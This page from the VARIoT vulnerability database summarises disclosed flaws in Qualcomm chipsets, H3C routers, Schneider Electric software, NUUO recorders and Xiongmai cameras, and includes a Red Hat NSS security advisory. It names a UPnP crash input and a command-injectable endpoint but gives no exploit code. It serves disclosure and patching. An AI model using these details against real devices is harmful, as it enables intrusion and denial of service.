VARIoT IoT vulnerabilities database

Security keys are logged when any WCDMA call is configured or reconfigured in snapdragon automobile, snapdragon mobile and snapdragon wear in versions MDM9607, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SDA660, SDX20, SXR1130. snapdragon automobile , snapdragon mobile , snapdragon wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9607 and others are products of Qualcomm (Qualcomm). The Qualcomm MDM9607 is a central processing unit (CPU). SDX24 is a modem. An information disclosure vulnerability exists in WCDMA in several Qualcomm products due to the program logging security keys when WCDMA calls are configured or reconfigured

Cryptographic key material leaked in WCDMA debug messages in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 800, SD 810, SD 820, SD 835, Snapdragon_High_Med_2016. Snapdragon Mobile and Snapdragon Wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564

A non-secure user may be able to access certain registers in snapdragon automobile, snapdragon mobile and snapdragon wear in versions IPQ8074, MDM9206, MDM9607, MDM9635M, MDM9650, MDM9655, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 650/52, SD 810, SD 820, SD 820A, SD 835, SDA660, SDM439, SDM630, SDM660, SDX24, Snapdragon_High_Med_2016. Snapdragon Automobile , Snapdragon Mobile , Snapdragon Wear Contains an access control vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm IPQ8074 and others are products of Qualcomm (Qualcomm). The Qualcomm IPQ8074 is a central processing unit (CPU). SDX24 is a modem. An information disclosure vulnerability exists in Core in several Qualcomm products

Security keys used by the terminal and NW for a session could be leaked in snapdragon mobile in versions MDM9650, MDM9655, SD 835, SDA660. snapdragon mobile Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564

Cryptographic key material leaked in debug messages - GERAN in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 800, SD 810, SD 820, SD 835, SD 855, SDX24, Snapdragon_High_Med_2016. Snapdragon Mobile and Snapdragon Wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9206, etc. are the central processing unit (CPU) products of Qualcomm (Qualcomm) applied to different platforms. An information disclosure vulnerability exists in GERAN in several Qualcomm products. An attacker could exploit this vulnerability to disclose encrypted key material in GERAN debug messages

Cryptographic keys are printed in modem debug messages in snapdragon mobile and snapdragon wear in versions MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8909W, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 636, SD 650/52, SD 800, SD 810, SD 820, SD 835, SDA660, SDM630, SDM660, Snapdragon_High_Med_2016. Snapdragon Mobile and Snapdragon Wear Contains an information disclosure vulnerability.Information may be obtained. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9206, etc. are the central processing unit (CPU) products of Qualcomm (Qualcomm) applied to different platforms. Modem is one of the modems. Modems in several Qualcomm products have security vulnerabilities. The vulnerability stems from the fact that the program prints the key in the debug information

Anti-rollback can be bypassed in replay scenario during app loading due to improper error handling of RPMB writes in snapdragon automobile, snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, MDM9650, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SDA660, SDX24, SXR1130. snapdragon automobile , snapdragon mobile , snapdragon wear Contains an error handling vulnerability.Information may be tampered with. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). The Qualcomm MDM9206 is a central processing unit (CPU). SDX24 is a modem. TrustZone is one of the system security components. A security vulnerability exists in TrustZone in several Qualcomm products due to improper handling of errors. Attackers can exploit this vulnerability to bypass the anti-rollback protection mechanism

H3C ER2100n is an enterprise-class router. H3C ER2100n has a denial of service vulnerability. All UPnP methods of this router can be accessed without authorization. When the UPnP method's input parameters contain "<< \ x00" characters, the UPnP service will crash. At this time, manual restart is required to restore the UPnP service. An attacker could exploit this vulnerability to cause a denial of service.

Data Center Expert, versions 7.5.0 and earlier, allows for the upload of a zip file from its user interface to the server. A carefully crafted, malicious file could be mistakenly uploaded by an authenticated user via this feature which could contain path traversal file names. As such, it could allow for the arbitrary upload of files contained with the zip onto the server file system outside of the intended directory. This is leveraging the more commonly known ZipSlip vulnerability within Java code. Data Center Expert Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Schneider Electric StruxureWare Data Center Expert is a set of centralized data center infrastructure management software from Schneider Electric (France). The software collects and distributes critical alerts, surveillance videos, and critical information, and supports a unified view of the physical infrastructure environment from anywhere on the network. Schneider Electric StruxureWare Data Center Expert has a security vulnerability

Data Center Operation allows for the upload of a zip file from its user interface to the server. A carefully crafted, malicious file could be mistakenly uploaded by an authenticated user via this feature which could contain path traversal file names. As such, it could allow for the arbitrary upload of files contained with the zip onto the server file system outside of the intended directory. This is leveraging the more commonly known ZipSlip vulnerability within Java code. Data Center Operation Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Schneider Electric StruxureWare Data Center Operation is a set of data center operation software from Schneider Electric of France. The software provides an instant overview of data center operations through inventory management, PUE calculations, real-time device alerts, and in-depth location-based analysis. Schneider Electric StruxureWare Data Center Operation has a security vulnerability

Huawei VIP App is a mobile app for Malaysia customers that purchased P20 Series, Nova 3/3i and Mate 20. There is a vulnerability in versions before 4.0.5 that attackers can conduct bruteforce to the VIP App Web Services to get user information. plural Huawei In product Contains an access control vulnerability.Information may be obtained. Huawei VIP App is a pre-installed membership service application for mobile phones of China Huawei (Huawei)

NUUO NVRMini2 version 3.9.1 is vulnerable to authenticated remote command injection. An attacker can send crafted requests to upgrade_handle.php to execute OS commands as root. NUUO NVRMini2 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NUUO NVRmini Products are prone to an remote command-injection vulnerability. An attacker may exploit this issue to inject and execute arbitrary commands within the context of the affected application; this may aid in further attacks. NOTE: This issue is the result of an incomplete fix for the issue described in BID 106058 (NUUO NVRmini Products CVE-2018-14933 Remote Command Injection Vulnerability). NUUO NVRMini2 is a small network DVR device from NUUO

The XM-JPE13-2R 960P is a high-definition night vision wireless intelligent surveillance camera. Xiongmai XM-JPR13-R (OL) is a 960P fisheye panoramic intelligent PTZ surveillance camera. The XM-JPE13-2R 960P and the XM-JPR13-R (OL) have information disclosure vulnerabilities. Attackers can use the vulnerability's built-in account to remotely view videos and modify camera configurations.

A cached side channel attack during handshakes using RSA encryption could allow for the decryption of encrypted content. This is a variant of the Adaptive Chosen Ciphertext attack (AKA Bleichenbacher attack) and affects all NSS versions prior to NSS 3.41. NSS Contains a cryptographic vulnerability.Information may be obtained. Mozilla Network Security Services is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: nss, nss-softokn, nss-util, and nspr security, bug fix, and enhancement update Advisory ID: RHSA-2019:2237-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2237 Issue date: 2019-08-06 CVE Names: CVE-2018-0495 CVE-2018-12404 ==================================================================== 1. Summary: An update for nss, nss-softokn, nss-util, and nspr is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. Description: Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications. Netscape Portable Runtime (NSPR) provides platform independence for non-GUI operating system facilities. The following packages have been upgraded to a later upstream version: nss (3.44.0), nss-softokn (3.44.0), nss-util (3.44.0), nspr (4.21.0). (BZ#1645231, BZ#1692269, BZ#1692271, BZ#1692274) Security Fix(es): * ROHNP: Key Extraction Side Channel in Multiple Crypto Libraries (CVE-2018-0495) * nss: Cache side-channel variant of the Bleichenbacher attack (CVE-2018-12404) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing this update, applications using nss or nspr (for example, Firefox) must be restarted for this update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1144186 - Cannot delete orphan private keys with certutil. 1212132 - Support for IKE/IPsec typical PKIX usage so libreswan can use nss without rejecting certs based on EKU 1431241 - Fully implement verification of RSA-PSS keys in certificates in tstclnt and selfserv [rhel-7] 1444136 - move NSS signtool to the unsupported tools in RHEL 7.6 1455288 - TLS 1.3 handshake fails with SSL_REQUIRE_SAFE_NEGOTIATION on 1508571 - Exporting RSA-PSS keys to PKCS#12 drops the rsa-pss identifier from them [rhel-7] 1508595 - Regression in handling unknown signature algorithms extensions 1509045 - selfserv refuses to use rsa-pss keys [rhel-7] 1509396 - RFC 5246 non compliance with CertificateVerify fallback to SHA-1 [rhel-7] 1510156 - RSA PKCS#1 v1.5 signatures made using rsa-pss keys are accepted as valid [rhel-7] 1514041 - certutil -O output isn't precise when the input is an ambiguous nickname used by multiple certificates 1533729 - [RFE] certutil capability: generate CSR from orphan private key 1538081 - Policy does not apply to MGF1 hash in RSA-PSS signatures [rhel-7] 1591163 - CVE-2018-0495 ROHNP: Key Extraction Side Channel in Multiple Crypto Libraries 1639873 - mod_nss - TLS Session ID is still not maintained (ref bz 1461580) 1657164 - `certutil -u I` is not documented 1657913 - CVE-2018-12404 nss: Cache side-channel variant of the Bleichenbacher attack 1670239 - libpkix name constraints check treats CN as DNS name when it should not 1712876 - post handshake authentication with selfserv does not work if SSL_ENABLE_SESSION_TICKETS is set [rhel-7] 6. Package List: Red Hat Enterprise Linux Client (v. 7): Source: nspr-4.21.0-1.el7.src.rpm nss-3.44.0-4.el7.src.rpm nss-softokn-3.44.0-5.el7.src.rpm nss-util-3.44.0-3.el7.src.rpm x86_64: nspr-4.21.0-1.el7.i686.rpm nspr-4.21.0-1.el7.x86_64.rpm nspr-debuginfo-4.21.0-1.el7.i686.rpm nspr-debuginfo-4.21.0-1.el7.x86_64.rpm nss-3.44.0-4.el7.i686.rpm nss-3.44.0-4.el7.x86_64.rpm nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-softokn-3.44.0-5.el7.i686.rpm nss-softokn-3.44.0-5.el7.x86_64.rpm nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-3.44.0-5.el7.i686.rpm nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm nss-sysinit-3.44.0-4.el7.x86_64.rpm nss-tools-3.44.0-4.el7.x86_64.rpm nss-util-3.44.0-3.el7.i686.rpm nss-util-3.44.0-3.el7.x86_64.rpm nss-util-debuginfo-3.44.0-3.el7.i686.rpm nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): x86_64: nspr-debuginfo-4.21.0-1.el7.i686.rpm nspr-debuginfo-4.21.0-1.el7.x86_64.rpm nspr-devel-4.21.0-1.el7.i686.rpm nspr-devel-4.21.0-1.el7.x86_64.rpm nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-devel-3.44.0-4.el7.i686.rpm nss-devel-3.44.0-4.el7.x86_64.rpm nss-pkcs11-devel-3.44.0-4.el7.i686.rpm nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm nss-softokn-devel-3.44.0-5.el7.i686.rpm nss-softokn-devel-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm nss-util-debuginfo-3.44.0-3.el7.i686.rpm nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm nss-util-devel-3.44.0-3.el7.i686.rpm nss-util-devel-3.44.0-3.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: nspr-4.21.0-1.el7.src.rpm nss-3.44.0-4.el7.src.rpm nss-softokn-3.44.0-5.el7.src.rpm nss-util-3.44.0-3.el7.src.rpm x86_64: nspr-4.21.0-1.el7.i686.rpm nspr-4.21.0-1.el7.x86_64.rpm nspr-debuginfo-4.21.0-1.el7.i686.rpm nspr-debuginfo-4.21.0-1.el7.x86_64.rpm nss-3.44.0-4.el7.i686.rpm nss-3.44.0-4.el7.x86_64.rpm nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-softokn-3.44.0-5.el7.i686.rpm nss-softokn-3.44.0-5.el7.x86_64.rpm nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-3.44.0-5.el7.i686.rpm nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm nss-sysinit-3.44.0-4.el7.x86_64.rpm nss-tools-3.44.0-4.el7.x86_64.rpm nss-util-3.44.0-3.el7.i686.rpm nss-util-3.44.0-3.el7.x86_64.rpm nss-util-debuginfo-3.44.0-3.el7.i686.rpm nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): x86_64: nspr-debuginfo-4.21.0-1.el7.i686.rpm nspr-debuginfo-4.21.0-1.el7.x86_64.rpm nspr-devel-4.21.0-1.el7.i686.rpm nspr-devel-4.21.0-1.el7.x86_64.rpm nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-devel-3.44.0-4.el7.i686.rpm nss-devel-3.44.0-4.el7.x86_64.rpm nss-pkcs11-devel-3.44.0-4.el7.i686.rpm nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm nss-softokn-devel-3.44.0-5.el7.i686.rpm nss-softokn-devel-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm nss-util-debuginfo-3.44.0-3.el7.i686.rpm nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm nss-util-devel-3.44.0-3.el7.i686.rpm nss-util-devel-3.44.0-3.el7.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: nspr-4.21.0-1.el7.src.rpm nss-3.44.0-4.el7.src.rpm nss-softokn-3.44.0-5.el7.src.rpm nss-util-3.44.0-3.el7.src.rpm ppc64: nspr-4.21.0-1.el7.ppc.rpm nspr-4.21.0-1.el7.ppc64.rpm nspr-debuginfo-4.21.0-1.el7.ppc.rpm nspr-debuginfo-4.21.0-1.el7.ppc64.rpm nspr-devel-4.21.0-1.el7.ppc.rpm nspr-devel-4.21.0-1.el7.ppc64.rpm nss-3.44.0-4.el7.ppc.rpm nss-3.44.0-4.el7.ppc64.rpm nss-debuginfo-3.44.0-4.el7.ppc.rpm nss-debuginfo-3.44.0-4.el7.ppc64.rpm nss-devel-3.44.0-4.el7.ppc.rpm nss-devel-3.44.0-4.el7.ppc64.rpm nss-softokn-3.44.0-5.el7.ppc.rpm nss-softokn-3.44.0-5.el7.ppc64.rpm nss-softokn-debuginfo-3.44.0-5.el7.ppc.rpm nss-softokn-debuginfo-3.44.0-5.el7.ppc64.rpm nss-softokn-devel-3.44.0-5.el7.ppc.rpm nss-softokn-devel-3.44.0-5.el7.ppc64.rpm nss-softokn-freebl-3.44.0-5.el7.ppc.rpm nss-softokn-freebl-3.44.0-5.el7.ppc64.rpm nss-softokn-freebl-devel-3.44.0-5.el7.ppc.rpm nss-softokn-freebl-devel-3.44.0-5.el7.ppc64.rpm nss-sysinit-3.44.0-4.el7.ppc64.rpm nss-tools-3.44.0-4.el7.ppc64.rpm nss-util-3.44.0-3.el7.ppc.rpm nss-util-3.44.0-3.el7.ppc64.rpm nss-util-debuginfo-3.44.0-3.el7.ppc.rpm nss-util-debuginfo-3.44.0-3.el7.ppc64.rpm nss-util-devel-3.44.0-3.el7.ppc.rpm nss-util-devel-3.44.0-3.el7.ppc64.rpm ppc64le: nspr-4.21.0-1.el7.ppc64le.rpm nspr-debuginfo-4.21.0-1.el7.ppc64le.rpm nspr-devel-4.21.0-1.el7.ppc64le.rpm nss-3.44.0-4.el7.ppc64le.rpm nss-debuginfo-3.44.0-4.el7.ppc64le.rpm nss-devel-3.44.0-4.el7.ppc64le.rpm nss-softokn-3.44.0-5.el7.ppc64le.rpm nss-softokn-debuginfo-3.44.0-5.el7.ppc64le.rpm nss-softokn-devel-3.44.0-5.el7.ppc64le.rpm nss-softokn-freebl-3.44.0-5.el7.ppc64le.rpm nss-softokn-freebl-devel-3.44.0-5.el7.ppc64le.rpm nss-sysinit-3.44.0-4.el7.ppc64le.rpm nss-tools-3.44.0-4.el7.ppc64le.rpm nss-util-3.44.0-3.el7.ppc64le.rpm nss-util-debuginfo-3.44.0-3.el7.ppc64le.rpm nss-util-devel-3.44.0-3.el7.ppc64le.rpm s390x: nspr-4.21.0-1.el7.s390.rpm nspr-4.21.0-1.el7.s390x.rpm nspr-debuginfo-4.21.0-1.el7.s390.rpm nspr-debuginfo-4.21.0-1.el7.s390x.rpm nspr-devel-4.21.0-1.el7.s390.rpm nspr-devel-4.21.0-1.el7.s390x.rpm nss-3.44.0-4.el7.s390.rpm nss-3.44.0-4.el7.s390x.rpm nss-debuginfo-3.44.0-4.el7.s390.rpm nss-debuginfo-3.44.0-4.el7.s390x.rpm nss-devel-3.44.0-4.el7.s390.rpm nss-devel-3.44.0-4.el7.s390x.rpm nss-softokn-3.44.0-5.el7.s390.rpm nss-softokn-3.44.0-5.el7.s390x.rpm nss-softokn-debuginfo-3.44.0-5.el7.s390.rpm nss-softokn-debuginfo-3.44.0-5.el7.s390x.rpm nss-softokn-devel-3.44.0-5.el7.s390.rpm nss-softokn-devel-3.44.0-5.el7.s390x.rpm nss-softokn-freebl-3.44.0-5.el7.s390.rpm nss-softokn-freebl-3.44.0-5.el7.s390x.rpm nss-softokn-freebl-devel-3.44.0-5.el7.s390.rpm nss-softokn-freebl-devel-3.44.0-5.el7.s390x.rpm nss-sysinit-3.44.0-4.el7.s390x.rpm nss-tools-3.44.0-4.el7.s390x.rpm nss-util-3.44.0-3.el7.s390.rpm nss-util-3.44.0-3.el7.s390x.rpm nss-util-debuginfo-3.44.0-3.el7.s390.rpm nss-util-debuginfo-3.44.0-3.el7.s390x.rpm nss-util-devel-3.44.0-3.el7.s390.rpm nss-util-devel-3.44.0-3.el7.s390x.rpm x86_64: nspr-4.21.0-1.el7.i686.rpm nspr-4.21.0-1.el7.x86_64.rpm nspr-debuginfo-4.21.0-1.el7.i686.rpm nspr-debuginfo-4.21.0-1.el7.x86_64.rpm nspr-devel-4.21.0-1.el7.i686.rpm nspr-devel-4.21.0-1.el7.x86_64.rpm nss-3.44.0-4.el7.i686.rpm nss-3.44.0-4.el7.x86_64.rpm nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-devel-3.44.0-4.el7.i686.rpm nss-devel-3.44.0-4.el7.x86_64.rpm nss-softokn-3.44.0-5.el7.i686.rpm nss-softokn-3.44.0-5.el7.x86_64.rpm nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm nss-softokn-devel-3.44.0-5.el7.i686.rpm nss-softokn-devel-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-3.44.0-5.el7.i686.rpm nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm nss-sysinit-3.44.0-4.el7.x86_64.rpm nss-tools-3.44.0-4.el7.x86_64.rpm nss-util-3.44.0-3.el7.i686.rpm nss-util-3.44.0-3.el7.x86_64.rpm nss-util-debuginfo-3.44.0-3.el7.i686.rpm nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm nss-util-devel-3.44.0-3.el7.i686.rpm nss-util-devel-3.44.0-3.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: nss-debuginfo-3.44.0-4.el7.ppc.rpm nss-debuginfo-3.44.0-4.el7.ppc64.rpm nss-pkcs11-devel-3.44.0-4.el7.ppc.rpm nss-pkcs11-devel-3.44.0-4.el7.ppc64.rpm ppc64le: nss-debuginfo-3.44.0-4.el7.ppc64le.rpm nss-pkcs11-devel-3.44.0-4.el7.ppc64le.rpm s390x: nss-debuginfo-3.44.0-4.el7.s390.rpm nss-debuginfo-3.44.0-4.el7.s390x.rpm nss-pkcs11-devel-3.44.0-4.el7.s390.rpm nss-pkcs11-devel-3.44.0-4.el7.s390x.rpm x86_64: nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-pkcs11-devel-3.44.0-4.el7.i686.rpm nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: nspr-4.21.0-1.el7.src.rpm nss-3.44.0-4.el7.src.rpm nss-softokn-3.44.0-5.el7.src.rpm nss-util-3.44.0-3.el7.src.rpm x86_64: nspr-4.21.0-1.el7.i686.rpm nspr-4.21.0-1.el7.x86_64.rpm nspr-debuginfo-4.21.0-1.el7.i686.rpm nspr-debuginfo-4.21.0-1.el7.x86_64.rpm nspr-devel-4.21.0-1.el7.i686.rpm nspr-devel-4.21.0-1.el7.x86_64.rpm nss-3.44.0-4.el7.i686.rpm nss-3.44.0-4.el7.x86_64.rpm nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-devel-3.44.0-4.el7.i686.rpm nss-devel-3.44.0-4.el7.x86_64.rpm nss-softokn-3.44.0-5.el7.i686.rpm nss-softokn-3.44.0-5.el7.x86_64.rpm nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm nss-softokn-devel-3.44.0-5.el7.i686.rpm nss-softokn-devel-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-3.44.0-5.el7.i686.rpm nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm nss-sysinit-3.44.0-4.el7.x86_64.rpm nss-tools-3.44.0-4.el7.x86_64.rpm nss-util-3.44.0-3.el7.i686.rpm nss-util-3.44.0-3.el7.x86_64.rpm nss-util-debuginfo-3.44.0-3.el7.i686.rpm nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm nss-util-devel-3.44.0-3.el7.i686.rpm nss-util-devel-3.44.0-3.el7.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: nss-debuginfo-3.44.0-4.el7.i686.rpm nss-debuginfo-3.44.0-4.el7.x86_64.rpm nss-pkcs11-devel-3.44.0-4.el7.i686.rpm nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2018-0495 https://access.redhat.com/security/cve/CVE-2018-12404 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBXUl2i9zjgjWX9erEAQgsZg//RYLUdEWlARE9jDIOZakUKoDGisG1+EU8 JJeTAGqksGTHEAgRpfOsYcM/uIuMXfBJmE1Gr6++KQteUhIT1aKTqbf3sdSM0fPo 97CYjcRXejluoO45Kmw7C4o9NN2MAeoEpykFQJyqM0gLIOu+thhMzViFUEEDf5YA jhOrkRw/xLJPhXkiUFcjBywMNsqi4TEHBKU3e+YgAUSBe2p6LaEbGJGnoFMBiskM 1mNqCmQHs0Q7yPE8F3wOXIve+CeZvvJlJQ10a9YLSM6tkUuf6KwqSEC0F8vLOnSF 6gpZZKXJgc70sTCJ0Eym82CHQD6kdzUBhN071P+wRX66fYai7CnbnuY77o2HVRRr 